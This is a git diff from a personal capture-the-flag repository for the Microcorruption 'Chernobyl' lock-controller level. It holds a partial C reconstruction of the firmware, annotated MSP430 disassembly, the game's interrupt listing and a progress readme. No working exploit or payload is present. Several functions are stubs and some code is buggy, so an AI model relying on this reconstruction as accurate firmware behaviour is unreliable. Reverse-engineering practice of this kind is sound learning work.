|
|
||||||
|
#include <stdint.h>
|
||||||
|
|
||||||
|
typedef uint16_t u16;
|
||||||
|
typedef int16_t i16;
|
||||||
|
typedef uint8_t u8;
|
||||||
|
typedef int8_t i8;
|
||||||
|
|
||||||
|
typedef struct registers {
|
||||||
|
// Registers = initial_state
|
||||||
|
u16 sp; // stack pointer
|
||||||
|
u16 sr; // status register
|
||||||
|
// General-purpose registers
|
||||||
|
// Caller-saved registers
|
||||||
|
u16 r4; // GPR 4
|
||||||
|
u16 r5; // GPR 5
|
||||||
|
u16 r6; // GPR 6
|
||||||
|
u16 r7; // GPR 7
|
||||||
|
u16 r8; // GPR 8
|
||||||
|
u16 r9; // GPR 9
|
||||||
|
u16 r10; // GPR 10
|
||||||
|
u16 r11; // GPR 11
|
||||||
|
// Callee-saved registers / function arguments / return value(s)
|
||||||
|
u16 r12; // GPR 12 ; arg 3
|
||||||
|
u16 r13; // GPR 13 ; arg 2
|
||||||
|
u16 r14; // GPR 14 ; arg 1
|
||||||
|
u16 r15; // GPR 15 ; arg 0
|
||||||
|
} re;
|
||||||
|
|
||||||
|
#endif
|
130
17 - Chernobyl/Code/src/chernobyl.c
Normal file
130
17 - Chernobyl/Code/src/chernobyl.c
Normal file
@ -0,0 +1,130 @@
|
|||||||
|
|
||||||
|
#include "chernobyl.h"
|
||||||
|
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <string.h>
|
||||||
|
|
||||||
|
#include "chernobyl_stdlib.h"
|
||||||
|
#include "chernobyl_types.h"
|
||||||
|
|
||||||
|
u16 to_decimal (char *buf) {
|
||||||
|
u16 num = 0; // r10
|
||||||
|
while (*buf) {
|
||||||
|
num *= 10;
|
||||||
|
num += *buf - '0';
|
||||||
|
buf++;
|
||||||
|
}
|
||||||
|
return num;
|
||||||
|
}
|
||||||
|
|
||||||
|
int main (int argc, char **argv) {
|
||||||
|
if (argc == 1) {
|
||||||
|
char buf[0x600] = {0};
|
||||||
|
while (printf(">> "), _getsn (buf, 0x5ff), !feof (stdin)) {
|
||||||
|
printf ("hash: %x, dec: %x\n", hash (buf), to_decimal(buf));
|
||||||
|
};
|
||||||
|
}
|
||||||
|
|
||||||
|
if (argc == 2) {
|
||||||
|
printf ("hash: %x\n", hash (argv[1]));
|
||||||
|
}
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
u16 _main () {
|
||||||
|
run ();
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
u16 walk (u16 r15) {
|
||||||
|
puts (s_4566); // "\n\n"
|
||||||
|
printf (s_4569); //%x [alloc] [p %x] [n %x] [s %x]
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
// 0x4b66: run
|
||||||
|
u16 run () {
|
||||||
|
// move stack -0x600
|
||||||
|
char buf[0x600];
|
||||||
|
u16 *hashtable = create_hash_table (0x3, 0x5); // todo: What do these args mean?
|
||||||
|
|
||||||
|
// 4b82: Print out some shit
|
||||||
|
puts (s_4a38); // "Welcome to the lock controller."
|
||||||
|
puts (s_4a58); // "You can open the door by entering 'access [your name] [pin]'"
|
||||||
|
puts (s_4a95); // ""
|
||||||
|
|
||||||
|
while (1) {
|
||||||
|
// 4b9a: zero out the stack buffer
|
||||||
|
for (int r14 = 0; r14 < 0x5ff; r14++) {
|
||||||
|
buf[r14] = 0;
|
||||||
|
}
|
||||||
|
// 4bb0: get 0x550 characters -> stack buffer
|
||||||
|
_getsn (buf, 0x550);
|
||||||
|
// 4bba: loop over the user input:
|
||||||
|
u16 index = 0;
|
||||||
|
while (buf[index] != 0) {
|
||||||
|
// 4bbe: check for 'a'
|
||||||
|
if (buf[index] == 'a') {
|
||||||
|
index += 7;
|
||||||
|
char *name = &buf[index];
|
||||||
|
// skip spaces
|
||||||
|
while (buf[index++] != ' ') {
|
||||||
|
if (buf[index] == 0)
|
||||||
|
break;
|
||||||
|
};
|
||||||
|
} else if (buf[index] == 'n') {
|
||||||
|
index += 4;
|
||||||
|
// skip spaces
|
||||||
|
while (buf[index++] != ' ') {
|
||||||
|
if (buf[index] == 0)
|
||||||
|
break;
|
||||||
|
};
|
||||||
|
} else {
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
// end of the function
|
||||||
|
puts (s_4b54); // "Invalid command."
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
u16 *create_hash_table (u16 r15, u16 r14) {
|
||||||
|
// todo: RE hash table creation
|
||||||
|
u8 *buf = (u8 *) malloc (0xa);
|
||||||
|
buf[0] = 0;
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Hash the string stored at addr
|
||||||
|
u16 hash (char *addr) {
|
||||||
|
u16 chr, hash = 0;
|
||||||
|
while (*addr) {
|
||||||
|
hash = *addr + hash;
|
||||||
|
hash = (hash << 5) - hash;
|
||||||
|
addr++;
|
||||||
|
}
|
||||||
|
return hash;
|
||||||
|
}
|
||||||
|
|
||||||
|
u16 add_to_table (u16 r15, u16 r14, u16 r13) {
|
||||||
|
// todo: add_to_table
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
// get_from_table hash_table* table, string* username
|
||||||
|
u16 get_from_table (void *r15, char *r14) {
|
||||||
|
u16 h = hash (r14);
|
||||||
|
u16 num = ((u16 *) r15)[2];
|
||||||
|
u16 power_of_two = (1 << num) - 1;
|
||||||
|
power_of_two = (power_of_two & h) << 1;
|
||||||
|
num = ((u16 *) r15)[6];
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
u16 rehash (u16 r15, u16 r14) {
|
||||||
|
// todo: this function is very long and performs dynalloc
|
||||||
|
return 0;
|
||||||
|
}
|
87
17 - Chernobyl/Code/src/chernobyl_stdlib.c
Normal file
87
17 - Chernobyl/Code/src/chernobyl_stdlib.c
Normal file
@ -0,0 +1,87 @@
|
|||||||
|
#include "chernobyl_stdlib.h"
|
||||||
|
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <string.h>
|
||||||
|
|
||||||
|
#include "chernobyl.h"
|
||||||
|
#include "chernobyl_types.h"
|
||||||
|
|
||||||
|
#define HEAP_BASE 0x2400
|
||||||
|
|
||||||
|
void __trap_interrupt () {
|
||||||
|
// Hardware will do something here
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
void set_w (u16* addr, u16 value) {
|
||||||
|
*((u16 *) &addr) = value;
|
||||||
|
}
|
||||||
|
|
||||||
|
u16 get_w (u16 *addr) {
|
||||||
|
return *((u16 *) addr);
|
||||||
|
}
|
||||||
|
|
||||||
|
void *_malloc (u16 size) {
|
||||||
|
// if heap not initialized, initialize the heap
|
||||||
|
// if (get_w (HEAP_BASE + 4)) {
|
||||||
|
// u16 heap_ptr = HEAP_BASE;
|
||||||
|
// set_w (heap_ptr, HEAP_BASE);
|
||||||
|
// set_w (heap_ptr + 2, HEAP_BASE);
|
||||||
|
// }
|
||||||
|
// create a new block on the heap
|
||||||
|
|
||||||
|
// return the address of the new block
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
void _free (void *ptr) {
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
u16 _putchar (char c) {
|
||||||
|
putchar (c);
|
||||||
|
return c;
|
||||||
|
}
|
||||||
|
|
||||||
|
i16 _getchar () {
|
||||||
|
return getchar ();
|
||||||
|
}
|
||||||
|
|
||||||
|
void _puts (const char *s) {
|
||||||
|
u8 character = 0;
|
||||||
|
while (character = *(u8 *) s++) {
|
||||||
|
_putchar (character);
|
||||||
|
}
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
void _getsn (char *__restrict buf, u16 length) {
|
||||||
|
fgets (buf, length, stdin);
|
||||||
|
buf[strnlen(buf, length) - 1] = '\0';
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
int _strcmp (const char *s1, const char *s2) {
|
||||||
|
while (*s1 == *s2) {
|
||||||
|
if (*(++s1) == 0) {
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
s2++;
|
||||||
|
}
|
||||||
|
return *s2 - *s1;
|
||||||
|
}
|
||||||
|
|
||||||
|
void INT (u16 interrupt) {
|
||||||
|
swpb (&interrupt);
|
||||||
|
interrupt |= 0x8000;
|
||||||
|
//r.sr = interrupt;
|
||||||
|
__trap_interrupt ();
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
void swpb (u16 *word) {
|
||||||
|
((u8 *) word)[0] = ((u8 *) word)[0] ^ ((u8 *) word)[1];
|
||||||
|
((u8 *) word)[1] = ((u8 *) word)[1] ^ ((u8 *) word)[0];
|
||||||
|
((u8 *) word)[0] = ((u8 *) word)[0] ^ ((u8 *) word)[1];
|
||||||
|
}
|
45
17 - Chernobyl/Interrupt Listing
Normal file
45
17 - Chernobyl/Interrupt Listing
Normal file
@ -0,0 +1,45 @@
|
|||||||
|
4.3 Interrupt Listing
|
||||||
|
The LockIT Pro has an augmented MSP430 CPU with a callgate at address
|
||||||
|
0x10 causing a software interrupt. The interrupts are described below.
|
||||||
|
|
||||||
|
INT 0x00.
|
||||||
|
The putchar interrupt: sends a single byte to the display.
|
||||||
|
Takes one argument with the character to print.
|
||||||
|
|
||||||
|
INT 0x01.
|
||||||
|
The getchar interrupt: reads a single byte of buffered input.
|
||||||
|
Takes no arguments.
|
||||||
|
|
||||||
|
INT 0x02.
|
||||||
|
The gets interrupt: read a specific number of bytes to standard input.
|
||||||
|
Takes two arguments. The first is the address to place the string, the
|
||||||
|
second is the maximum number of bytes to read. Null bytes are not handled
|
||||||
|
specially null-terminated.
|
||||||
|
|
||||||
|
INT 0x10.
|
||||||
|
Turn on DEP: pages are either executable or writable but never both.
|
||||||
|
Takes no arguments.
|
||||||
|
|
||||||
|
INT 0x11.
|
||||||
|
Mark as a page as either only executable or only writable.
|
||||||
|
Takes two one arguments. The first argument is the page number, the
|
||||||
|
second argument is 1 if writable, 0 if executable.
|
||||||
|
|
||||||
|
INT 0x20.
|
||||||
|
The rand interrupt: request a random 16-bit number.
|
||||||
|
Takes no arguments.
|
||||||
|
|
||||||
|
INT 0x7D.
|
||||||
|
Interface with the HSM-1. Set a flag in memory if the password passed in is
|
||||||
|
correct.
|
||||||
|
Takes two arguments. The first argument is the password to test, the
|
||||||
|
second is the location of a flag to overwrite if the password is correct.
|
||||||
|
|
||||||
|
INT 0x7E.
|
||||||
|
Interface with the HSM-2. Trigger the deadbolt unlock if the password is
|
||||||
|
correct.
|
||||||
|
Takes one argument: the password to test.
|
||||||
|
|
||||||
|
INT 0x7F.
|
||||||
|
Interface with deadbolt to trigger an unlock if the password is correct.
|
||||||
|
Takes no arguments.
|
3
17 - Chernobyl/instructions.txt
Normal file
3
17 - Chernobyl/instructions.txt
Normal file
@ -0,0 +1,3 @@
|
|||||||
|
main:
|
||||||
|
sp -= 8;
|
||||||
|
run()
|
1150
17 - Chernobyl/mc-disasm.asm
Normal file
1150
17 - Chernobyl/mc-disasm.asm
Normal file
File diff suppressed because it is too large
Load Diff
207
17 - Chernobyl/mc-run.asm
Normal file
207
17 - Chernobyl/mc-run.asm
Normal file
@ -0,0 +1,207 @@
|
|||||||
|
4b66 <run>
|
||||||
|
4b66: 0b12 push index
|
||||||
|
4b68: 0a12 push r10
|
||||||
|
4b6a: 0912 push r9
|
||||||
|
4b6c: 0812 push r8
|
||||||
|
4b6e: 0712 push r7
|
||||||
|
; allocate 0x600 buffer on stack. Woah!
|
||||||
|
4b70: 3150 00fa add #0xfa00, sp
|
||||||
|
|
||||||
|
; r8 = create_hash_table (0x3, 0x5)
|
||||||
|
4b74: 3e40 0500 mov #0x5, r14
|
||||||
|
4b78: 3f40 0300 mov #0x3, r15
|
||||||
|
4b7c: b012 7847 call #0x4778 <create_hash_table>
|
||||||
|
4b80: 084f mov r15, r8 ; save result
|
||||||
|
|
||||||
|
; print out some shit
|
||||||
|
4b82: 3f40 384a mov #0x4a38, r15
|
||||||
|
4b86: b012 504d call #0x4d50 <puts>
|
||||||
|
4b8a: 3f40 584a mov #0x4a58, r15
|
||||||
|
4b8e: b012 504d call #0x4d50 <puts>
|
||||||
|
4b92: 3f40 954a mov #0x4a95, r15
|
||||||
|
4b96: b012 504d call #0x4d50 <puts>
|
||||||
|
|
||||||
|
; zero out the stack buffer allocated above
|
||||||
|
4b9a: 0e43 clr r14
|
||||||
|
4b9c: 3740 ff05 mov #0x5ff, r7
|
||||||
|
4ba0: 053c jmp $+0xc <run+0x46>
|
||||||
|
; run+0x3c
|
||||||
|
4ba2: 0f41 mov sp, r15
|
||||||
|
4ba4: 0f5e add r14, r15
|
||||||
|
4ba6: cf43 0000 mov.b #0x0, 0x0(r15)
|
||||||
|
4baa: 1e53 inc r14
|
||||||
|
; run+0x46:
|
||||||
|
4bac: 079e cmp r14, r7
|
||||||
|
4bae: f937 jge $-0xc <run+0x3c>
|
||||||
|
|
||||||
|
; get 0x550 characters -> stack buffer
|
||||||
|
4bb0: 3e40 5005 mov #0x550, r14
|
||||||
|
4bb4: 0f41 mov sp, r15
|
||||||
|
4bb6: b012 404d call #0x4d40 <getsn>
|
||||||
|
; run+0x54:
|
||||||
|
4bba: 0b41 mov sp, index
|
||||||
|
4bbc: 923c jmp $+0x126 <run+0x17c>
|
||||||
|
; check for 'a'
|
||||||
|
__access_check:
|
||||||
|
4bbe: 7f90 6100 cmp.b #0x61, r15
|
||||||
|
4bc2: 3a20 jnz $+0x76 <run+0xd2> ; __access%20_check
|
||||||
|
4bc4: 0e4b mov index, r14
|
||||||
|
4bc6: 3e50 0700 add #0x7, r14
|
||||||
|
4bca: 0b4e mov r14, index
|
||||||
|
4bcc: 073c jmp $+0x10 <run+0x76>
|
||||||
|
; run+0x68:
|
||||||
|
; check for ' '
|
||||||
|
4bce: 7f90 2000 cmp.b #0x20, r15
|
||||||
|
4bd2: 0320 jnz $+0x8 <run+0x74>
|
||||||
|
4bd4: cb43 0000 mov.b #0x0, 0x0(index)
|
||||||
|
4bd8: 043c jmp $+0xa <run+0x7c>
|
||||||
|
4bda: 1b53 inc index
|
||||||
|
; run+0x76:
|
||||||
|
4bdc: 6f4b mov.b @index, r15
|
||||||
|
4bde: 4f93 tst.b r15
|
||||||
|
4be0: f623 jnz $-0x12 <run+0x68>
|
||||||
|
; run+0x7c:
|
||||||
|
4be2: 1b53 inc index
|
||||||
|
4be4: 0a43 clr r10
|
||||||
|
4be6: 0b3c jmp $+0x18 <run+0x98>
|
||||||
|
; run+0x82:
|
||||||
|
; r13 =
|
||||||
|
4be8: 0d4a mov r10, r13
|
||||||
|
4bea: 0d5d add r13, r13
|
||||||
|
4bec: 0d5d add r13, r13
|
||||||
|
4bee: 0d5a add r10, r13
|
||||||
|
4bf0: 0d5d add r13, r13
|
||||||
|
|
||||||
|
4bf2: 6a4b mov.b @index, r10
|
||||||
|
4bf4: 8a11 sxt r10
|
||||||
|
4bf6: 3a50 d0ff add #0xffd0, r10
|
||||||
|
4bfa: 0a5d add r13, r10
|
||||||
|
4bfc: 1b53 inc index
|
||||||
|
; run+0x98:
|
||||||
|
4bfe: 6f4b mov.b @index, r15
|
||||||
|
4c00: 4f93 tst.b r15
|
||||||
|
4c02: 0324 jz $+0x8 <run+0xa4>
|
||||||
|
; check for ';'
|
||||||
|
4c04: 7f90 3b00 cmp.b #0x3b, r15
|
||||||
|
4c08: ef23 jnz $-0x20 <run+0x82>
|
||||||
|
; run+0xa4:
|
||||||
|
4c0a: 0f48 mov r8, r15
|
||||||
|
4c0c: b012 cc49 call #0x49cc <get_from_table>
|
||||||
|
4c10: 3f93 cmp #-0x1, r15
|
||||||
|
4c12: 0320 jnz $+0x8 <run+0xb4>
|
||||||
|
; No such box.
|
||||||
|
4c14: 3f40 964a mov #0x4a96, r15
|
||||||
|
4c18: 413c jmp $+0x84 <run+0x136>
|
||||||
|
4c1a: 0aef xor r15, r10
|
||||||
|
4c1c: 3af0 ff7f and #0x7fff, r10
|
||||||
|
4c20: 0820 jnz $+0x12 <run+0xcc>
|
||||||
|
4c22: 0f9a cmp r10, r15
|
||||||
|
4c24: 0334 jge $+0x8 <run+0xc6>
|
||||||
|
; Access granted
|
||||||
|
4c26: 3f40 a34a mov #0x4aa3, r15
|
||||||
|
4c2a: 383c jmp $+0x72 <run+0x136>
|
||||||
|
; Access granted, but account not activated.
|
||||||
|
4c2c: 3f40 b34a mov #0x4ab3, r15
|
||||||
|
4c30: 353c jmp $+0x6c <run+0x136>
|
||||||
|
; Aceess denied [sic]
|
||||||
|
4c32: 3f40 de4a mov #0x4ade, r15
|
||||||
|
4c36: 323c jmp $+0x66 <run+0x136>
|
||||||
|
; run+0xd2:
|
||||||
|
; check for 'n'
|
||||||
|
__n_check:
|
||||||
|
4c38: 7f90 6e00 cmp.b #0x6e, r15
|
||||||
|
4c3c: 4020 jnz $+0x82 <run+0x158>
|
||||||
|
4c3e: 094b mov index, r9
|
||||||
|
4c40: 2952 add #0x4, r9
|
||||||
|
4c42: 0b49 mov r9, index
|
||||||
|
4c44: 073c jmp $+0x10 <run+0xee>
|
||||||
|
; run+0xe0
|
||||||
|
; check for ' '
|
||||||
|
4c46: 7f90 2000 cmp.b #0x20, r15
|
||||||
|
4c4a: 0320 jnz $+0x8 <run+0xec>
|
||||||
|
4c4c: cb43 0000 mov.b #0x0, 0x0(index) ; if next char is space, skip it
|
||||||
|
4c50: 043c jmp $+0xa <run+0xf4>
|
||||||
|
; run+0xec
|
||||||
|
4c52: 1b53 inc index
|
||||||
|
4c54: 6f4b mov.b @index, r15
|
||||||
|
4c56: 4f93 tst.b r15
|
||||||
|
4c58: f623 jnz $-0x12 <run+0xe0>
|
||||||
|
4c5a: 1b53 inc index
|
||||||
|
4c5c: 0a43 clr r10
|
||||||
|
4c5e: 0b3c jmp $+0x18 <run+0x110>
|
||||||
|
|
||||||
|
_to_decimal: ; convert the ascii in r10 to decimal?
|
||||||
|
4c60: 0c4a mov r10, r12
|
||||||
|
4c62: 0c5c add r12, r12 ; x2
|
||||||
|
4c64: 0c5c add r12, r12 ; x4
|
||||||
|
4c66: 0c5a add r10, r12 ; x5
|
||||||
|
4c68: 0c5c add r12, r12 ; xA
|
||||||
|
4c6a: 6a4b mov.b @index, r10
|
||||||
|
4c6c: 8a11 sxt r10
|
||||||
|
; Subtract 0x30
|
||||||
|
4c6e: 3a50 d0ff add #0xffd0, r10
|
||||||
|
4c72: 0a5c add r12, r10
|
||||||
|
4c74: 1b53 inc index
|
||||||
|
; run+0x110
|
||||||
|
4c76: 6f4b mov.b @index, r15
|
||||||
|
4c78: 4f93 tst.b r15
|
||||||
|
4c7a: 0324 jz $+0x8 <run+0x11c>
|
||||||
|
|
||||||
|
; check for ';'
|
||||||
|
4c7c: 7f90 3b00 cmp.b #0x3b, r15
|
||||||
|
4c80: ef23 jnz $-0x20 <run+0xfa>
|
||||||
|
4c82: 0a93 tst r10
|
||||||
|
4c84: 0334 jge $+0x8 <run+0x126>
|
||||||
|
|
||||||
|
; Can not have pin with high bit set
|
||||||
|
4c86: 3f40 ec4a mov #0x4aec, r15
|
||||||
|
4c8a: 083c jmp $+0x12 <run+0x136>
|
||||||
|
|
||||||
|
4c8c: 0e49 mov r9, r14
|
||||||
|
4c8e: 0f48 mov r8, r15
|
||||||
|
4c90: b012 cc49 call #0x49cc <get_from_table>
|
||||||
|
4c94: 3f93 cmp #-0x1, r15
|
||||||
|
4c96: 0524 jz $+0xc <run+0x13c>
|
||||||
|
; User already has an account
|
||||||
|
4c98: 3f40 124b mov #0x4b12, r15
|
||||||
|
4c9c: b012 504d call #0x4d50 <puts>
|
||||||
|
4ca0: 1c3c jmp $+0x3a <run+0x174>
|
||||||
|
|
||||||
|
add_user_account:
|
||||||
|
4ca2: 0a12 push r10
|
||||||
|
4ca4: 0912 push r9
|
||||||
|
4ca6: 3012 2f4b push #0x4b2f
|
||||||
|
4caa: b012 4844 call #0x4448 <printf>
|
||||||
|
4cae: 3150 0600 add #0x6, sp
|
||||||
|
4cb2: 0d4a mov r10, r13
|
||||||
|
4cb4: 0e49 mov r9, r14
|
||||||
|
4cb6: 0f48 mov r8, r15
|
||||||
|
4cb8: b012 3248 call #0x4832 <add_to_table>
|
||||||
|
4cbc: 0e3c jmp $+0x1e <run+0x174> ; NOT strings
|
||||||
|
; end of the function:
|
||||||
|
4cbe: 3f40 544b mov #0x4b54, r15
|
||||||
|
4cc2: b012 504d call #0x4d50 <puts>
|
||||||
|
failure_case:
|
||||||
|
4cc6: 1f43 mov #0x1, r15
|
||||||
|
4cc8: 3150 0006 add #0x600, sp
|
||||||
|
run_end:
|
||||||
|
4ccc: 3741 pop r7
|
||||||
|
4cce: 3841 pop r8
|
||||||
|
4cd0: 3941 pop r9
|
||||||
|
4cd2: 3a41 pop r10
|
||||||
|
4cd4: 3b41 pop index
|
||||||
|
4cd6: 3041 ret
|
||||||
|
|
||||||
|
; loop_end
|
||||||
|
4cd8: 1b53 inc index
|
||||||
|
; check for ';'
|
||||||
|
4cda: fb90 3b00 0000 cmp.b #0x3b, 0x0(index)
|
||||||
|
4ce0: fb27 jz $-0x8 <run+0x172>
|
||||||
|
; end of the loop
|
||||||
|
; run+0x17c:
|
||||||
|
4ce2: 6f4b mov.b @index, r15
|
||||||
|
4ce4: 4f93 tst.b r15
|
||||||
|
4ce6: 6b23 jnz $-0x128 <run+0x58> ; 4bbe
|
||||||
|
; cleanup
|
||||||
|
4ce8: 0e43 clr r14
|
||||||
|
4cea: 603f jmp $-0x13e <run+0x46>
|
BIN
17 - Chernobyl/memory.bin
Normal file
BIN
17 - Chernobyl/memory.bin
Normal file
Binary file not shown.
33
readme.md
Normal file
33
readme.md
Normal file
@ -0,0 +1,33 @@
|
|||||||
|
# WARNING: SPOILERS AHEAD
|
||||||
|
# [Micro Corruption](https://microcorruption.com/) Solutions and Progress
|
||||||
|
|
||||||
|
This repo is for keeping track of my Microcorruption progress, and organizing my solutions.
|
||||||
|
As of the time of writing, i'm on Chernobyl, and working slowly but surely towards a solution.
|
||||||
|
Hopefully in the coming weeks I'll learn enough about malloc and free to get something done on it!
|
||||||
|
|
||||||
|
## Timeline of Events:
|
||||||
|
|
||||||
|
### 2022 Jul 28 PM:
|
||||||
|
Tutorial
|
||||||
|
New Orleans
|
||||||
|
Sydney
|
||||||
|
### 2022 Jul 29 AM:
|
||||||
|
Hanoi
|
||||||
|
Cusco
|
||||||
|
Reykjavik
|
||||||
|
Whitehorse
|
||||||
|
Montevideo
|
||||||
|
Johannesberg
|
||||||
|
Santa Cruz
|
||||||
|
### 2022 Jul 29 PM:
|
||||||
|
Jakarta
|
||||||
|
Addis Ababa
|
||||||
|
Novosibirsk
|
||||||
|
Algiers
|
||||||
|
### 2022 Jul 30 AM:
|
||||||
|
Vladivostok
|
||||||
|
Bangalore
|
||||||
|
### 2022 Jul 31 AM:
|
||||||
|
Lagos
|
||||||
|
### 2022 Jul 31 PM - Present Day:
|
||||||
|
Chernobyl (ongoing)
|
Loading…
Reference in New Issue
Block a user